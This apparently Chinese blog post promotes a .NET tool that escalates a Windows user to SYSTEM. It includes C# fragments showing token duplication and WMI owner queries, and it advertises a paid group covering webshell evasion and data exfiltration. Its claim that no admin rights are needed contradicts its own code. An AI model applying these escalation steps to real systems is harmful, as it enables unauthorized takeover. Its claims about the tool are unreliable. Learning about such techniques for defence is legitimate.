​.NET 内网一键提权工具:绕过UAC+SYSTEM

原创 已于 2024-12-23 11:26:12 修改 · 731 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #.netcore #网络 #.net #web安全 #学习

于 2024-12-02 08:30:00 首次发布

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4Byass2SYSTEM.exe 是一款高效的本地提权工具,支持一键绕过用户账户控制(UAC),将当前用户权限提升至 SYSTEM。此工具无需以管理员身份运行,直接双击即可使用。运行后,工具会弹出一个带有 SYSTEM 权限的交互式 cmd.exe 窗口,为渗透测试或本地权限提升提供便利。

03使用方法

无需以管理员身份运行,程序会自动分析当前用户权限,并尝试提权至 SYSTEM,具体命令如下所示。

Sharp4Byass2SYSTEM.exe

成功后,用户将获得 SYSTEM 权限的交互式命令行窗口,如下图所示。

图片

04原理解析

此工具的核心逻辑首先使用 GetProcessOwner 方法获取当前进程所属的用户,具体代码如下所示。

string owner = Program.GetProcessOwner(Process.GetCurrentProcess().Id);
Console.WriteLine("User: " + owner);

接着,检查当前用户是否为管理员并且非 NT 权限账户,如下所示。

if (Program.IsAdministrator() && !owner.StartsWith("NT"))
{
    Console.WriteLine("Starting Elevating to SYSTEM");
    Program.jumptoSys();
}

然后,使用 OpenProcessToken 方法获取当前进程的令牌句柄,如下所示。

IntPtr procHandle = process.Handle;
IntPtr tokenHandle = IntPtr.Zero;
WinApi.OpenProcessToken(procHandle, 2U, out tokenHandle);

调用 DuplicateTokenEx 方法,克隆一个具有 PRIMARY 类型的新令牌,如下所示。

WinApi.SECURITY_ATTRIBUTES SECA = default(WinApi.SECURITY_ATTRIBUTES);
IntPtr doubleDuplicateToken = IntPtr.Zero;
WinApi.DuplicateTokenEx(tokenHandle, 33554432U, ref SECA, 2, WinApi.TOKEN_TYPE.TokenPrimary, out doubleDuplicateToken);

通过 ManagementObjectSearcher 查询目标进程 ID 的详细信息

string query = "Select * From Win32_Process Where ProcessID = " + processId.ToString();
ManagementObjectSearcher searcher = new ManagementObjectSearcher(query);
ManagementObjectCollection processList = searcher.Get();
foreach (ManagementBaseObject managementBaseObject in processList)
{
    ManagementObject obj = (ManagementObject)managementBaseObject;
    string[] argList = new string[] { string.Empty, string.Empty };
    obj.InvokeMethod("GetOwner", argList);
}

最后,使用克隆的主令牌启动 SYSTEM 权限的 cmd.exe,结合 SYSTEM 账户的进程控制权限,通过新创建的令牌直接启动交互式命令窗口。

05.NET安全星球

dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输

 这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术,更是每一位网络安全爱好者不可或缺的实战利器。

文章涉及的工具已打包,请加/入/后下/载:https://wx.zsxq.com/group/51121224455454

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值